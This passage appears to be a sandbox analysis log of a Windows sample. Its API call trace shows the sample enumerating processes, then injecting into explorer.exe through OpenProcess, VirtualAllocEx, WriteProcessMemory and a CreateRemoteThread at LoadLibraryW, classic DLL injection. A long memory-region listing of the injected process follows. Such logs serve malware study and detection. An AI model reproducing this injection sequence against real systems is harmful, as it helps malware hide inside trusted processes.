lpMultiByteStr=0x14f288c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Module32FirstW", lpUsedDefaultChar=0x0) returned 14 [0027.324] GetProcAddress (hModule=0x75900000, lpProcName="Module32FirstW") returned 0x7593c59e [0027.324] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32NextW", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0027.324] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32NextW", cchWideChar=13, lpMultiByteStr=0x14f288c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Module32NextW", lpUsedDefaultChar=0x0) returned 13 [0027.324] GetProcAddress (hModule=0x75900000, lpProcName="Module32NextW") returned 0x7593c11f [0027.324] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32FirstW", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0027.325] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32FirstW", cchWideChar=14, lpMultiByteStr=0x14f288c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Module32FirstW", lpUsedDefaultChar=0x0) returned 14 [0027.325] GetProcAddress (hModule=0x75900000, lpProcName="Module32FirstW") returned 0x7593c59e [0027.325] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32NextW", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0027.325] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32NextW", cchWideChar=13, lpMultiByteStr=0x14f288c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Module32NextW", lpUsedDefaultChar=0x0) returned 13 [0027.325] GetProcAddress (hModule=0x75900000, lpProcName="Module32NextW") returned 0x7593c11f [0027.325] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xb0 [0027.327] Process32FirstW (in: hSnapshot=0xb0, lppe=0x23e184 | out: lppe=0x23e184*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0027.328] Process32NextW (in: hSnapshot=0xb0, lppe=0x23e184 | out: lppe=0x23e184*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4d, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0027.328] Process32NextW (in: hSnapshot=0xb0, lppe=0x23e184 | out: lppe=0x23e184*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0027.329] Process32NextW (in: hSnapshot=0xb0, lppe=0x23e184 | out: lppe=0x23e184*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x138, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0027.330] Process32NextW (in: hSnapshot=0xb0, lppe=0x23e184 | out: lppe=0x23e184*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x138, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0027.330] Process32NextW (in: hSnapshot=0xb0, lppe=0x23e184 | out: lppe=0x23e184*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x168, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0027.330] Process32NextW (in: hSnapshot=0xb0, lppe=0x23e184 | out: lppe=0x23e184*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x168, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0027.331] Process32NextW (in: hSnapshot=0xb0, lppe=0x23e184 | out: lppe=0x23e184*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x170, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0027.331] Process32NextW (in: hSnapshot=0xb0, lppe=0x23e184 | out: lppe=0x23e184*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0027.332] Process32NextW (in: hSnapshot=0xb0, lppe=0x23e184 | out: lppe=0x23e184*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0027.332] Process32NextW (in: hSnapshot=0xb0, lppe=0x23e184 | out: lppe=0x23e184*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0027.333] Process32NextW (in: hSnapshot=0xb0, lppe=0x23e184 | out: lppe=0x23e184*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0027.333] Process32NextW (in: hSnapshot=0xb0, lppe=0x23e184 | out: lppe=0x23e184*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0027.334] Process32NextW (in: hSnapshot=0xb0, lppe=0x23e184 | out: lppe=0x23e184*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x308, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0027.334] Process32NextW (in: hSnapshot=0xb0, lppe=0x23e184 | out: lppe=0x23e184*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2b, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0027.335] Process32NextW (in: hSnapshot=0xb0, lppe=0x23e184 | out: lppe=0x23e184*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2b8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0027.335] Process32NextW (in: hSnapshot=0xb0, lppe=0x23e184 | out: lppe=0x23e184*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0027.336] Process32NextW (in: hSnapshot=0xb0, lppe=0x23e184 | out: lppe=0x23e184*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0027.336] Process32NextW (in: hSnapshot=0xb0, lppe=0x23e184 | out: lppe=0x23e184*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x308, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0027.337] Process32NextW (in: hSnapshot=0xb0, lppe=0x23e184 | out: lppe=0x23e184*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x4d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0027.337] Process32NextW (in: hSnapshot=0xb0, lppe=0x23e184 | out: lppe=0x23e184*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0027.338] Process32NextW (in: hSnapshot=0xb0, lppe=0x23e184 | out: lppe=0x23e184*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0027.338] Process32NextW (in: hSnapshot=0xb0, lppe=0x23e184 | out: lppe=0x23e184*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x564, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0027.338] Process32NextW (in: hSnapshot=0xb0, lppe=0x23e184 | out: lppe=0x23e184*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x4f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="jusched.exe")) returned 1 [0027.339] Process32NextW (in: hSnapshot=0xb0, lppe=0x23e184 | out: lppe=0x23e184*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0027.339] Process32NextW (in: hSnapshot=0xb0, lppe=0x23e184 | out: lppe=0x23e184*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="httpd.exe")) returned 1 [0027.340] Process32NextW (in: hSnapshot=0xb0, lppe=0x23e184 | out: lppe=0x23e184*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9e, th32ParentProcessID=0x644, pcPriClassBase=8, dwFlags=0x0, szExeFile="httpd.exe")) returned 1 [0027.340] Process32NextW (in: hSnapshot=0xb0, lppe=0x23e184 | out: lppe=0x23e184*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0027.341] Process32NextW (in: hSnapshot=0xb0, lppe=0x23e184 | out: lppe=0x23e184*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="mobsync.exe")) returned 1 [0027.341] Process32NextW (in: hSnapshot=0xb0, lppe=0x23e184 | out: lppe=0x23e184*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb6c, pcPriClassBase=8, dwFlags=0x0, szExeFile="regsvr32.exe")) returned 1 [0027.342] Process32NextW (in: hSnapshot=0xb0, lppe=0x23e184 | out: lppe=0x23e184*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb6c, pcPriClassBase=8, dwFlags=0x0, szExeFile="regsvr32.exe")) returned 0 [0027.342] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75900000 [0027.343] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="VirtualAllocEx", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0027.343] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="VirtualAllocEx", cchWideChar=14, lpMultiByteStr=0x14f288c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VirtualAllocEx", lpUsedDefaultChar=0x0) returned 14 [0027.343] GetProcAddress (hModule=0x75900000, lpProcName="VirtualAllocEx") returned 0x7593c1b6 [0027.343] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WriteProcessMemory", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0027.343] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WriteProcessMemory", cchWideChar=18, lpMultiByteStr=0x150830c, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteProcessMemory", lpUsedDefaultChar=0x0) returned 18 [0027.343] GetProcAddress (hModule=0x75900000, lpProcName="WriteProcessMemory") returned 0x7593c1de [0027.343] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CreateRemoteThread", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0027.343] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CreateRemoteThread", cchWideChar=18, lpMultiByteStr=0x1508384, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateRemoteThread", lpUsedDefaultChar=0x0) returned 18 [0027.343] GetProcAddress (hModule=0x75900000, lpProcName="CreateRemoteThread") returned 0x7598f33b [0027.343] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="OpenProcess", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0027.343] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="OpenProcess", cchWideChar=11, lpMultiByteStr=0x14f286c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OpenProcess", lpUsedDefaultChar=0x0) returned 11 [0027.343] GetProcAddress (hModule=0x75900000, lpProcName="OpenProcess") returned 0x759459d7 [0027.343] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x4f0) returned 0xb4 [0027.343] VirtualAllocEx (hProcess=0xb4, lpAddress=0x0, dwSize=0x42, flAllocationType=0x1000, flProtect=0x4) returned 0x4fd0000 [0027.343] WriteProcessMemory (in: hProcess=0xb4, lpBaseAddress=0x4fd0000, lpBuffer=0x152c1e4*, nSize=0x42, lpNumberOfBytesWritten=0x23e3a0 | out: lpBuffer=0x152c1e4*, lpNumberOfBytesWritten=0x23e3a0*=0x42) returned 1 [0029.925] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="LoadLibraryW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0029.925] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="LoadLibraryW", cchWideChar=12, lpMultiByteStr=0x14f288c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LoadLibraryW", lpUsedDefaultChar=0x0) returned 12 [0029.926] GetProcAddress (hModule=0x75900000, lpProcName="LoadLibraryW") returned 0x75953c01 [0029.926] CreateRemoteThread (in: hProcess=0xb4, lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x75953c01, lpParameter=0x4fd0000, dwCreationFlags=0x0, lpThreadId=0x23e3ac | out: lpThreadId=0x23e3ac*=0xc00) returned 0xb8 [0029.926] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0030.257] CloseHandle (hObject=0xb8) returned 1 [0030.257] CloseHandle (hObject=0xb4) returned 1 [0030.259] GetCurrentThreadId () returned 0xbfc [0030.261] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75900000 [0030.261] GetProcAddress (hModule=0x75900000, lpProcName="GetLogicalProcessorInformation") returned 0x75932004 [0030.261] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x75900000 [0030.261] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x3691f0 [0030.261] GetProcAddress (hModule=0x75900000, lpProcName="GetLogicalProcessorInformation") returned 0x75932004 [0030.261] GetLogicalProcessorInformation (in: Buffer=0x0, ReturnedLength=0x23e53c | out: Buffer=0x0, ReturnedLength=0x23e53c) returned 0 [0030.261] GetLastError () returned 0x7a [0030.261] GetLogicalProcessorInformation (in: Buffer=0x14eb370, ReturnedLength=0x23e53c | out: Buffer=0x14eb370, ReturnedLength=0x23e53c) returned 1 [0030.261] GetCurrentThreadId () returned 0xbfc [0030.261] GetCurrentThreadId () returned 0xbfc [0030.261] GetCurrentProcess () returned 0xffffffff [0030.261] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x12b0000, lpBuffer=0x23e4fc, dwLength=0x1c | out: lpBuffer=0x23e4fc*(BaseAddress=0x12b0000, AllocationBase=0x12b0000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000)) returned 0x1c [0030.262] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x12b1000, lpBuffer=0x23e4fc, dwLength=0x1c | out: lpBuffer=0x23e4fc*(BaseAddress=0x12b1000, AllocationBase=0x12b0000, AllocationProtect=0x80, RegionSize=0xd8000, State=0x1000, Protect=0x20, Type=0x1000000)) returned 0x1c [0030.262] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x1389000, lpBuffer=0x23e4fc, dwLength=0x1c | out: lpBuffer=0x23e4fc*(BaseAddress=0x1389000, AllocationBase=0x12b0000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x1000000)) returned 0x1c [0030.262] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x138a000, lpBuffer=0x23e4fc, dwLength=0x1c | out: lpBuffer=0x23e4fc*(BaseAddress=0x138a000, AllocationBase=0x12b0000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x8, Type=0x1000000)) returned 0x1c [0030.262] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x138b000, lpBuffer=0x23e4fc, dwLength=0x1c | out: lpBuffer=0x23e4fc*(BaseAddress=0x138b000, AllocationBase=0x12b0000, AllocationProtect=0x80, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x1000000)) returned 0x1c [0030.262] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x1390000, lpBuffer=0x23e4fc, dwLength=0x1c | out: lpBuffer=0x23e4fc*(BaseAddress=0x1390000, AllocationBase=0x12b0000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x8, Type=0x1000000)) returned 0x1c [0030.262] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x1391000, lpBuffer=0x23e4fc, dwLength=0x1c | out: lpBuffer=0x23e4fc*(BaseAddress=0x1391000, AllocationBase=0x12b0000, AllocationProtect=0x80, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x1000000)) returned 0x1c [0030.262] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x1395000, lpBuffer=0x23e4fc, dwLength=0x1c | out: lpBuffer=0x23e4fc*(BaseAddress=0x1395000, AllocationBase=0x12b0000, AllocationProtect=0x80, RegionSize=0x70000, State=0x1000, Protect=0x2, Type=0x1000000)) returned 0x1c [0030.262] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x1405000, lpBuffer=0x23e4fc, dwLength=0x1c | out: lpBuffer=0x23e4fc*(BaseAddress=0x1405000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0xb000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0030.262] GetCurrentThreadId () returned 0xbfc [0030.262] GetCurrentThreadId () returned 0xbfc [0030.262] ResetEvent (hEvent=0xa8) returned 1 [0030.262] GetCurrentThreadId () returned 0xbfc [0030.262] GetCurrentThreadId () returned 0xbfc [0030.262] GetCurrentThreadId () returned 0xbfc [0030.262] ResetEvent (hEvent=0xa8) returned 1 [0030.262] GetCurrentThreadId () returned 0xbfc [0030.262] GetCurrentThreadId () returned 0xbfc [0030.262] GetCurrentThreadId () returned 0xbfc [0030.262] GetCurrentThreadId () returned 0xbfc [0030.262] GetCurrentThreadId () returned 0xbfc [0030.262] GetCurrentThreadId () returned 0xbfc [0030.262] GetCurrentThreadId () returned 0xbfc [0030.262] GetCurrentThreadId () returned 0xbfc [0030.262] GetCurrentThreadId () returned 0xbfc [0030.262] GetCurrentThreadId () returned 0xbfc [0030.262] GetCurrentThreadId () returned 0xbfc [0030.262] GetCurrentThreadId () returned 0xbfc [0030.263] GetCurrentThreadId () returned 0xbfc [0030.263] CloseHandle (hObject=0xa8) returned 1 [0030.263] CloseHandle (hObject=0xac) returned 1 [0030.263] GetCurrentThreadId () returned 0xbfc [0030.263] GetCurrentThreadId () returned 0xbfc [0030.263] GetCurrentThreadId () returned 0xbfc [0030.264] FreeLibrary (hLibModule=0x75900000) returned 1 [0030.264] LocalFree (hMem=0x3691f0) returned 0x0 [0030.264] FreeLibrary (hLibModule=0x75900000) returned 1 [0030.264] LocalFree (hMem=0x364df8) returned 0x0 [0030.264] LocalFree (hMem=0x364dd8) returned 0x0 Process: id = "3" image_name = "explorer.exe" filename = "c:\\windows\\explorer.exe" page_root = "0x7f09e2a0" os_pid = "0x4f0" monitor_reason = "injection" parent_id = "2" os_parent_pid = "0xbf8" cmd_line = "C:\\Windows\\Explorer.EXE" cur_dir = "C:\\Windows\\system32\\" Region: id = 292 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 293 start_va = 0x20000 end_va = 0x21fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 294 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 295 start_va = 0x40000 end_va = 0x41fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 296 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 297 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 298 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 299 start_va = 0x80000 end_va = 0x17ffff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 300 start_va = 0x180000 end_va = 0x1e6fff entry_point = 0x180000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" Region: id = 301 start_va = 0x1f0000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 302 start_va = 0x230000 end_va = 0x230fff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 303 start_va = 0x240000 end_va = 0x25ffff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 304 start_va = 0x260000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 305 start_va = 0x270000 end_va = 0x271fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 306 start_va = 0x280000 end_va = 0x280fff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 307 start_va = 0x290000 end_va = 0x291fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 308 start_va = 0x2a0000 end_va = 0x2a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 309 start_va = 0x2b0000 end_va = 0x2bffff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 310 start_va = 0x2c0000 end_va = 0x387fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002c0000" filename = "" Region: id = 311 start_va = 0x390000 end_va = 0x490fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000390000" filename = "" Region: id = 312 start_va = 0x4a0000 end_va = 0x892fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004a0000" filename = "" Region: id = 313 start_va = 0x8a0000 end_va = 0x99ffff entry_point = 0x0 region_type = private name = "private_0x00000000008a0000" filename = "" Region: id = 314 start_va = 0x9a0000 end_va = 0x9a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009a0000" filename = "" Region: id = 315 start_va = 0x9b0000 end_va = 0x9b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009b0000" filename = "" Region: id = 316 start_va = 0x9c0000 end_va = 0x9fffff entry_point = 0x0 region_type = private name = "private_0x00000000009c0000" filename = "" Region: id = 317 start_va = 0xa00000 end_va = 0xadefff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a00000" filename = "" Region: id = 318 start_va = 0xae0000 end_va = 0xb0bfff entry_point = 0x0 region_type = private name = "private_0x0000000000ae0000" filename = "" Region: id = 319 start_va = 0xb10000 end_va = 0xb3ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b10000" filename = "" Region: id = 320 start_va = 0xb40000 end_va = 0xbbffff entry_point = 0x0 region_type = private name = "private_0x0000000000b40000" filename = "" Region: id = 321 start_va = 0xbc0000 end_va = 0xe40fff entry_point = 0xbf0efa region_type = mapped_file name = "explorer.exe" filename = "\\Windows\\explorer.exe" Region: id = 322 start_va = 0xe50000 end_va = 0x1a4ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e50000" filename = "" Region: id = 323 start_va = 0x1a50000 end_va = 0x1a8ffff entry_point = 0x0 region_type = private name = "private_0x0000000001a50000" filename = "" Region: id = 324 start_va = 0x1a90000 end_va = 0x1d5efff entry_point = 0x1a90000 region_type = mapped_file name = "SortDefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" Region: id = 325 start_va = 0x1d60000 end_va = 0x1d61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001d60000" filename = "" Region: id = 326 start_va = 0x1d70000 end_va = 0x1d71fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001d70000" filename = "" Region: id = 327 start_va = 0x1d80000 end_va = 0x1d80fff entry_point = 0x0 region_type = private name = "private_0x0000000001d80000" filename = "" Region: id = 328 start_va = 0x1d90000 end_va = 0x1d92fff entry_point = 0x1d90000 region_type = mapped_file name = "comctl32.dll.mui" filename = "\\Windows\\winsxs\\x86_microsoft.windows.c..-controls.resources_6595b64144ccf1df_6.0.7600.16385_en-us_581cd2bf5825dde9\\comctl32.dll.mui" Region: id = 329 start_va = 0x1da0000 end_va = 0x1da0fff entry_point = 0x0 region_type = private name = "private_0x0000000001da0000" filename = "" Region: id = 330 start_va = 0x1db0000 end_va = 0x1deffff entry_point = 0x0 region_type = private name = "private_0x0000000001db0000" filename = "" Region: id = 331 start_va = 0x1df0000 